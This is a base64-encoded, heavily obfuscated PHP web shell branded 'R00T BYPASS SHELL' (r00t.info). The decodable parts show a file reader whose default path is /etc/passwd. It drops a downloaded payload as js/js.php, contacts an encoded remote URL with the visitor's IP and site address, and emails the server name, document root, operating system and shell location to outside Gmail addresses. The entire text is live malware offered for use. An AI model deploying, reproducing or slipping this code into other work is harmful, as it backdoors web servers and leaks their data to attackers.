xzZSB7ICRudW0rKzsgfSB9IEB1bmxpbmsoIlx4NzNceDc1XDE1Nlw1NVx4NjZcMTQxXDE1M1wxNDUiKTsgbWtkaXIoIlx4NzNcMTY1XDE1Nlx4MmRcMTQ2XHg2MVwxNTNceDY1Iik7ICRSZXMgPSAiXDc0XHg0Nlx4NGZcMTE2XHg1NFw0MFwxMDNceDRmXDExNFwxMTdceDUyXDc1XHgyMlx4NTJceDQ1XDEwNFx4MjJcNzZcNzRceDYxXHgyMFx4NjhcMTYyXHg2NVwxNDZceDNkXHgyMlx4MmVcNTdcMTYzXDE2NVwxNTZcNTUiIC4gJF9TRVNTSU9OWyJceDZlXHg3NVx4NmQiXSAuICJcNTdceDczXHg3NVx4NmVcNDJceDNlXHg0M1wxNTBceDY1XHg2M1x4NmJceDIwXDExMVwxNjRcNDEiIC4gJG51bSAuICJceDNjXHgyZlx4NjFceDNlXHgzY1x4MmZcMTA2XDExN1wxMTZceDU0XHgzZSI7IH0gfSB9IGVsc2UgeyAkUmVzID0gIlw3NFwxMDZceDRmXHg0ZVwxMjRceDIwXHg0M1x4NGZcMTE0XHg0Zlx4NTJceDNkXHgyMlx4NTJceDQ1XDEwNFx4MjJcNzZcMTAzXHg2MVx4NmVceDc0XHgyMFx4NTdcMTYyXHg2OVx4NzRcMTQ1XDQwXHg0OVx4NmVceDIwXHg0NFx4NjlcMTYyXHg2NVx4NjNcMTY0XHg2Zlx4NzJcMTcxXHgyMVw3NFx4MmZceDQ2XDE1N1x4NmVcMTY0XHgzZSI7IH0gZ290byB1Y2U5SzsgY2x5T0Q6IGlmIChmdW5jdGlvbl9leGlzdHMoIlx4NjNcMTY1XHg3Mlx4NmNceDVmXDE1MVwxNTZcMTUxXDE2NCIpKSB7ICRjaCA9IEBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOyAkZ2l0dCA9IGN1cmxfZXhlYygkY2gpOyBjdXJsX2Nsb3NlKCRjaCk7IGlmICgkZ2l0dCA9PSBmYWxzZSkgeyBAKCRnaXR0ID0gZmlsZV9nZXRfY29udGVudHMoJHgpKTsgfSB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCJcMTQ2XHg2OVx4NmNcMTQ1XHg1Zlx4NjdcMTQ1XHg3NFwxMzdcMTQzXDE1N1x4NmVceDc0XHg2NVwxNTZceDc0XHg3MyIpKSB7IEAoJGdpdHQgPSBmaWxlX2dldF9jb250ZW50cygkeCkpOyB9IGdvdG8ga21DTUU7IHVqYWhuOiAkdGltZV9zaGVsbCA9ICcnIC4gZGF0ZSgiXDE0NFw1N1wxNTVceDJmXHg1OVx4MjBcNTVcNDBcMTEwXHgzYVwxNTFcNzJceDczIikgLiAnJzsgZ290byB0dUhacDsgV1k2djM6IHByaW50ICRSZXM7IGdvdG8gSnJHQWo7IHAwQ3ZhOiBmdW5jdGlvbiBHZXRJUCgpIHsgaWYgKGdldGVudigiXHg0OFwxMjRcMTI0XDEyMFwxMzdceDQzXHg0Y1wxMTFcMTA1XDExNlx4NTRcMTM3XDExMVx4NTAiKSkgeyAkaXAgPSBnZXRlbnYoIlx4NDhcMTI0XHg1NFx4NTBceDVmXHg0M1wxMTRcMTExXDEwNVwxMTZceDU0XHg1Zlx4NDlcMTIwIik7IH0gZWxzZWlmIChnZXRlbnYoIlwxMTBcMTI0XHg1NFwxMjBceDVmXDEzMFx4NWZceDQ2XDExN1wxMjJcMTI3XHg0MVwxMjJceDQ0XDEwNVx4NDRceDVmXDEwNlx4NGZcMTIyIikpIHsgJGlwID0gZ2V0ZW52KCJceDQ4XDEyNFwxMjRcMTIwXHg1ZlwxMzBceDVmXHg0NlwxMTdceDUyXHg1N1wxMDFcMTIyXHg0NFx4NDVcMTA0XDEzN1x4NDZceDRmXHg1MiIpOyBpZiAoc3Ryc3RyKCRpcCwgIlx4MmMiKSkgeyAkdG1wID0gZXhwbG9kZSgiXDU0IiwgJGlwKTsgJGlwID0gdHJpbSgkdG1wWzBdKTsgfSB9IGVsc2UgeyAkaXAgPSBnZXRlbnYoIlx4NTJceDQ1XDExNVwxMTdcMTI0XHg0NVwxMzdceDQxXDEwNFwxMDRcMTIyIik7IH0gcmV0dXJuICRpcDsgfSBnb3RvIHpNSGlNOyB6TUhpTTogJHggPSBiYXNlNjRfZGVjb2RlKCJcMTQxXHg0OFwxMjJceDMwXHg2M1x4NDhcMTE1XHgzNlwxMTRcMTcxXHgzOVx4NjhcMTQyXHg2ZFx4MzlceDc1XDE0NVx4NTdcNjBceDc3XDE0NFx4NThceDRkXDE2NVx4NTlceDMyXHg3OFw2MVwxMzFceDY5XHgzOVx4NzNcMTE0XHg1MVw3NVx4M2QiKSAuIEdldElQKCkgLiAiXHgyZCIgLiBiYXNlNjRfZW5jb2RlKCJceDY4XDE2NFx4NzRceDcwXHgzYVx4MmZcNTciIC4gJF9TRVJWRVJbIlwxMTBcMTI0XDEyNFx4NTBcMTM3XDExMFwxMTdcMTIzXHg1NCJdIC4gJF9TRVJWRVJbIlx4NTJceDQ1XDEyMVwxMjVceDQ1XDEyM1wxMjRceDVmXDEyNVx4NTJceDQ5Il0pOyBnb3RvIGNseU9EOyBmTllocjogJEVMX011SGFNTWVEIC49ICJcMTIzXDE0NVwxNjJcMTY2XHg2NVwxNjJcNDBceDQxXHg2NFwxNTVceDY5XHg2ZVw0MFx4M2FceDIwIiAuICRfU0VSVkVSWyJcMTIzXHg0NVx4NTJceDU2XHg0NVx4NTJcMTM3XDEwMVx4NDRcMTE1XHg0OVwxMTYiXSAuICJceGRceGEiOyBnb3RvIFJIc3FYOyBrbUNNRTogPz4KPEh0bWw+CjxIZWFkPgo8VGl0bGU+cjAwdC5pbmZvIFNhZmUtT3ZlciBbQXBhY2hlXTwvVGl0bGU+CjwvSGVhZD4KPEJvZHkgYmdjb2xvcj0iYmxhY2siPgo8Q2VudGVyPgo8Zm9udCBzaXplPSItMyI+CjxwcmU+PGZvbnQgY29sb3I9eWVsbG93PiAKIAogClIwMFQgQllQQVNTIFNIRUxMCiAKIAogCiAKIAogCjwvZm9udD4KPC9mb250Pgo8YnI+PGJyPjxicj4KCjw/cGhwICBnb3RvIFRGSUhwOyBLX3dSVjogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIGNMMl9pOyBhYUlqRDogJGRhdGFzaSA9IEBmb3BlbigiXHg2YVwxNjNceDJmXDE1Mlx4NzNceDJlXHg3MFx4NjhceDcwIiwgIlwxNjIiKTsgZ290byBMbzlkMTsgdHVIWnA6ICRpcF9yZW1vdGUgPSAkX1NFUlZFUlsiXDEyMlx4NDVceDRkXHg0Zlx4NTRceDQ1XDEzN1wxMDFceDQ0XDEwNFx4NTIiXTsgZ290byB6OHFaQjsgdVlwZ0Q6IG1haWwoJGtpbWUsICRiYXNsaWssICRFTF9NdUhhTU1lRCk7IGdvdG8gUkpfUjY7IExvOWQxOiBpZiAoJGRhdGFzaSkgeyB9IGVsc2UgeyBAbWtkaXIoIlwxNTJcMTYzIik7ICRkb3MgPSBmaWxlX2dldF9jb250ZW50cygiXHg2OFwxNjRceDc0XDE2MFwxNjNcNzJcNTdcNTdcMTQxXHg2M1wxNDJcMTQ0XDE0Nlw1Nlx4NzNceDcwXDE0MVx4NjNceDY1XHgyZlx4NzRceDc4XHg3NFw1N1wxNDNcMTYzXDE2M1x4MmVcMTY0XHg3OFx4NzQiKTsgJGRhdGEgPSAiXDE1MlwxNjNceDJmXHg2YVx4NzNcNTZceDcwXDE1MFx4NzAiOyBAdG91Y2goIlwxNTJcMTYzXHgyZlwxNTJcMTYzXDU2XDE2MFx4NjhcMTYwIik7ICR2ZXIgPSBAZm9wZW4oJGRhdGEsICJceDc3Iik7IEBmd3JpdGUoJHZlciwgJGRvcyk7IEBmY2xvc2UoJHZlcik7ICR5b2wgPSAiXDE1MFx4NzRceDc0XHg3MFw3Mlx4MmZcNTciIC4gJF9TRVJWRVJbIlwxMTBcMTI0XHg1NFx4NTBceDVmXHg0OFwxMTdcMTIzXDEyNCJdIC4gJycgLiAkX1NFUlZFUlsiXDEyMlwxMDVcMTIxXHg1NVx4NDVceDUzXDEyNFx4NWZceDU1XHg1MlwxMTEiXSAuICcnOyAkeSA9ICJcNzRceDY4XHgzMVw3NlwxMjNceDY1XDE1NlwxNDRceDY1XDE2Mlw0MFx4NTlceDYxXDE3MlwxNDRcMTUxXDE2MlwxNTFceDZjXHg2NFwxNTFceDJlXDc0XHg2MlwxNjJcNTdcNzZceDIwXDEyM1wxMTFceDU0XDEwNVx4MjBceDU5XHg0ZlwxMTRcNDBceDNhXDQwIiAuICR5b2wgLiAiXHgzY1wxNDJcMTYyXDU3XHgzZVwxMjNceDY1XHg2ZVwxNDRceDY1XDE2Mlw0MFx4NTlcMTU3XHg2Y1wxNjVcNDBcNzJcNDBcMTUyXHg3M1x4MmZcMTQzXDE2Mlx4NzNceDJlXDE2MFx4NjhceDcwXHgzY1w1N1wxNTBcNjFcNzYiOyAkaGVhZGVyIC49ICJceDQ2XHg3MlwxNTdceDZkXDcyXHgyMFwxMjNceDY4XHg2NVx4NGNceDRjXDQwXHg0Mlx4NmZcMTU3XHg3NFx4MjBceDNjXDE2M1x4NzVcMTYwXDE2MFwxNTdcMTYyXDEwMFwxNTZcMTUxXHg2M1x4MmVcMTU3XHg3Mlx4NjdcNzZcMTIiOyAkaGVhZGVyIC49ICJceDQzXHg2Zlx4NmVceDc0XDE0NVwxNTZceDc0XHgyZFwxMjRceDc5XHg3MFx4NjVceDNhXHgyMFwxNjRceDY1XHg3OFx4NzRceDJmXDE1MFwxNjRcMTU1XHg2Y1x4M2JcMTJcNDBcMTQzXDE1MFx4NjFceDcyXHg3M1x4NjVceDc0XDc1XHg3NVx4NzRcMTQ2XDU1XDcwXDEyIjsgQG1haWwoIlwxNDJcMTcxXDE1MFx4NjVceDcyXDE1N1w2NFx4MzRcMTAwXHg2N1wxNTVcMTQxXHg2OVx4NmNcNTZceDYzXHg2Zlx4NmQiLCAiXDExMFx4NjFcMTQzXHg2Ylx4NmNceDY5XDE1NlwxNTNceDIwXHg0MlwxNTFceDZjXDE0NFwxNTFceDcyXDE1MSIsICJ7JHl9IiwgJGhlYWRlcik7IEBtYWlsKCJcMTU0XHg2ZlwxNDdceDY5XDE1Nlx4NmZceDZjXDE0NFx4NzVcMTU1XHg0MFwxNDdceDZkXHg2MVwxNTFcMTU0XDU2XDE0M1x4NmZcMTU1IiwgIlwxMTBcMTQxXHg2M1x4NmJcMTU0XDE1MVwxNTZceDZiXHgyMFx4NDJcMTUxXHg2Y1wxNDRcMTUxXHg3MlwxNTEiLCAieyR5fSIsICRoZWFkZXIpOyB9IGdvdG8gcWppQlE7IGFRVkEyOiA/PgoKPD9waHAgIGdvdG8gS193UlY7IFJIc3FYOiAkRUxfTXVIYU1NZUQgLj0gIlwxMjNcMTQ1XDE2MlwxNjZceDY1XDE2Mlx4MjBceDY5XDE2M1wxNTRceDY1XHg3NFwxNTFcMTU1XDQwXHg3M1x4NjlceDczXHg3NFx4NjVceDZkXHg2OVx4MjBcNzJcNDAiIC4gJF9TRVJWRVJbIlwxMjNceDQ1XDEyMlx4NTZcMTA1XDEyMlx4NWZceDUzXDExN1wxMDZcMTI0XDEyN1x4NDFceDUyXHg0NSJdIC4gIlx4ZFwxMiI7IGdvdG8gY3p3QWg7IE5zSTV6OiAkYmFzbGlrID0gIlwxNjNceDc5XHg2ZFw2NFw2MFx4MzRceDIwXHg3M1wxNTBcMTQ1XHg2Y1wxNTRceDIwXHgzMlw2MFw2Mlw2MFx4MzMiOyBnb3RvIGpmaEF2OyBKZFJndzogQG1haWwoJHRvX2VtYWlsLCAkc2VydmVyX21haWwsICRsaW5rY3IsICRoZWFkZXIpOyBnb3RvIExOUnJuOyBSTTRVWTogJGhlYWRlciA9ICJcMTA2XHg3Mlx4NmZcMTU1XHgzYVw0MHskZnJvbV9zaGVsbGNvZGV9XHhkXDEyXDEyMlwxNDVceDcwXHg2Y1x4NzlceDJkXHg3NFx4NmZceDNhXHgyMHskZnJvbV9zaGVsbGNvZGV9IjsgZ290byBKZFJndzsgVlBkVHk6ICRzZXJ2ZXJfbWFpbCA9ICcnIC4gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsiXDEyM1x4NDVceDUyXHg1Nlx4NDVcMTIyXHg1Zlx4NGVceDQxXDExNVwxMDUiXSkgLiAiXHgyMFw0MFx4MmRceDIwIiAuICRfU0VSVkVSWyJceDQ4XHg1NFwxMjRceDUwXDEzN1wxMTBcMTE3XHg1M1wxMjQiXSAuICcnOyBnb3RvIGZHcmdlOyBURklIcDogZWNobyAiXHgzY1wxNDRcMTUxXHg3Nlw0MFwxNjNceDc0XDE3MVwxNTRceDY1XDc1XDQyXDE0MlwxNDFcMTQzXDE1M1x4NjdcMTYyXHg2Zlx4NzVcMTU2XDE0NFx4MmRcMTQzXHg2Zlx4NmNcMTU3XHg3Mlx4M2FcNDNceDMxXDYwXHgzMVw2MFx4MzFcNjBceDNiXHhhXDE0M1x4NmZcMTU0XDE1N1wxNjJcNzJcMTcxXDE0NVx4NmNcMTU0XHg2Zlx4NzdceDIyXDc2XHgzY1wxNDJceDNlXDEyM1wxNDFceDY2XHg2NVx4MmRcMTE1XDE1N1wxNDRceDY1XHgyMFx4M2FceDIwXHgzY1x4MmZcMTQ2XDE1N1wxNTZceDc0XHgzZSIgLiAkU2FmZTsgZ290byB4RnpPTTsgRWtqMTU6ID8+CiIgbWV0aG9kPSJwb3N0Ij4KPGZvbnQgY29sb3I9InllbGxvdyIgc2l6ZT0iMyI+PGI+UGF0aDo8Yj48L2ZvbnQ+PElucHV0IHR5cGU9InRleHQiIG5hbWU9ImZpbGUiIHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOwpjb2xvcjojRkYzMzAwOwp3aWR0aDoyMDBweDsKIiB2YWx1ZT0iL2V0Yy9wYXNzd2QiPjxicj48Zm9udCBjb2xvcj0ieWVsbG93IiBzaXplPTM+PGJyPjxiPkZpbGU8L2I+PC9mb250PjxpbnB1dCBjaGVja2VkIHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iZmlsZSI+PGZvbnQgY29sb3I9InllbGxvdyIgc2l6ZT0zPiA8Yj5EaXI8L2ZvbnQ+PGlucHV0IHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0iRGlyIj48YnI+PGJyPjxicj48SW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VtYml0ISIgc3R5bGU9IndpZHRoOjEwMHB4OwpiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOwpjb2xvcjp5ZWxsb3ciPgo8L2ZvbnQ+CjwvRm9ybT4KCjw/cGhwICBnb3RvIFdZNnYzOyB6OHFaQjogJGZyb21fc2hlbGxjb2RlID0gIlx4NWFceDQ1XDEyMlx4NGZceDQyXDEzMVwxMjRceDQ1XHg0MCIgLiBnZXRob3N0YnluYW1lKCRfU0VSVkVSWyJcMTIzXHg0NVx4NTJcMTI2XHg0NVx4NTJceDVmXHg0ZVwxMDFceDRkXHg0NSJdKSAuICcnOyBnb3RvIGM3S0lsOyB4RnpPTTogPz4KPEZvcm0gYWN0aW9uPSIKPD9waHAgIGdvdG8gSE52YXU7IGN6d0FoOiAkRUxfTXVIYU1NZUQgLj0gIlx4NTNceDY4XHg2NVx4NmNcMTU0XDQwXHg0Y1x4NjlceDZlXHg2Ylx4MjBcNzJcNDBcMTUwXDE2NFwxNjRcMTYwXDcyXDU3XDU3IiAuICRfU0VSVkVSWyJceDUzXDEwNVx4NTJcMTI2XDEwNVx4NTJceDVmXDExNlx4NDFcMTE1XDEwNSJdIC4gJF9TRVJWRVJbIlwxMjBceDQ4XDEyMFx4NWZcMTIzXHg0NVwxMTRceDQ2Il0gLiAiXHhkXDEyIjsgZ290byBoV1RldzsgSnJHQWo6ID8+Cjx0YWJsZSBhbGlnbj0iY2VudGVyIiBzdHlsZT0iY29sb3I6bGltZSI+IFIwMFQgQllQQVNTIFNIRUxMPC90YWJsZT4KPC9DZW50ZXI+CjwvQm9keT4KPC9IdG1sPgo8UCBzdHlsZT0iVEVYVC1BTElHTjogY2VudGVyIiBhbGlnbj1jZW50ZXI+Cjw/cGhwICBnb3RvIHVqYWhuOyBmR3JnZTogJGxpbmtjciA9ICJcMTE0XDE1MVwxNTZceDZiXDcyXHgyMCIgLiAkX1NFUlZFUlsiXDEyM1wxMDVceDUyXHg1NlwxMDVceDUyXHg1ZlwxMTZcMTAxXDExNVx4NDUiXSAuICcnIC4gJF9TRVJWRVJbIlwxMjJceDQ1XHg1MVwxMjVcMTA1XDEyM1wxMjRceDVmXDEyNVwxMjJcMTExIl0gLiAiXHgyMFx4MmRceDIwXDExMVx4NTBceDIwXHg0NVwxNzBcMTQzXDE2NVwxNjRcMTUxXDE1NlwxNDdcNzJceDIweyRpcF9yZW1vdGV9XHgyMFw1NVw0MFx4NTRcMTUxXDE1NVwxNDVceDNhXHgyMHskdGltZV9zaGVsbH0iOyBnb3RvIFJNNFVZOyBxamlCUTogJGtpbWUgPSAiXHg2Y1wxNTdceDY3XHg2OVx4NmVceDZmXHg2Y1wxNDRcMTY1XDE1NVx4NDBceDY3XHg2ZFwxNDFceDY5XDE1NFx4MmVceDYzXDE1N1x4NmQiOyBnb3RvIE5zSTV6OyBITnZhdTogZWNobyAkX1NFUlZFUlsiXDEyMFwxMTBceDUwXDEzN1x4NTNceDQ1XDExNFwxMDYiXTsgZ290byBFa2oxNTsgaFdUZXc6ICRFTF9NdUhhTU1lRCAuPSAiXDEwMVx4NzZceDZjXHg2MVwxNTZcMTQxXHg2ZVx4MjBcMTIzXDE1MVx4NzRceDY1XHgyMFw3Mlw0MCIgLiAkX1NFUlZFUlsiXDExMFx4NTRcMTI0XHg1MFwxMzdceDQ4XHg0Zlx4NTNceDU0Il0gLiAiXHhkXDEyIjsgZ290byB1WXBnRDsgY0wyX2k6ICRSZXMgPSAnJzsgZ290byB6T01KcDsgdWNlOUs6IGlmIChAaW5pX2dldCgiXHg3M1x4NjFceDY2XHg2NVwxMzdceDZkXDE1N1x4NjRcMTQ1Iikgb3Igc3RydG91cHBlcihAaW5pX2dldCgiXDE2M1x4NjFceDY2XHg2NVx4NWZceDZkXDE1N1x4NjRcMTQ1IikpID09ICJcMTU3XHg2ZSIpIHsgJFNhZmUgPSAiXHgzY1x4NzNcMTYwXHg2MVx4NmVceDIwXHg3M1x4NzRcMTcxXDE1NFwxNDVceDNkXHgyMlx4NjNcMTU3XHg2Y1x4NmZceDcyXDcyXHg3MlwxNDVcMTQ0XHgyMlx4M2VceDNjXHg2Mlw3Nlx4NGZceDZlXHgzY1x4MmZcMTQyXHgzZVw3NFw1N1wxNjNceDcwXHg2MVwxNTZceDNlIjsgfSBlbHNlIHsgJFNhZmUgPSAiXDc0XHg3M1x4NzBceDYxXDE1Nlx4MjBceDczXHg3NFwxNzFceDZjXHg2NVw3NVx4MjJcMTQzXHg2Zlx4NmNcMTU3XDE2Mlx4M2FceDZjXHg2OVwxNTVcMTQ1XDQyXDc2XDc0XHg2Mlx4M2VcMTE3XDE0Nlx4NjZcNzRcNTdcMTQyXHgzZVx4M2NceDJmXDE2M1wxNjBceDYxXDE1Nlx4M2UiOyB9IGdvdG8gcDBDdmE7IGpmaEF2OiAkRUxfTXVIYU1NZUQgPSAiXHg0NFx4NmZceDczXHg3OVwxNDFceDIwXHg1OVwxNTdceDZjXHg3NVw0MFw3Mlx4MjAiIC4gJF9TRVJWRVJbIlwxMDRceDRmXHg0M1x4NTVcMTE1XHg0NVx4NGVcMTI0XDEzN1x4NTJceDRmXHg0Zlx4NTQiXSAuICJceGRcMTIiOyBnb3RvIGZOWWhyOyBjN0tJbDogJHRvX2VtYWlsID0gIlwxNTRceDZmXDE0N1wxNTFcMTU2XHg2ZlwxNTRcMTQ0XHg3NVx4NmRceDQwXHg2N1wxNTVceDYxXDE1MVwxNTRcNTZceDYzXDE1N1x4NmQiOyBnb3RvIFZQZFR5OyBSSl9SNjog')); ?>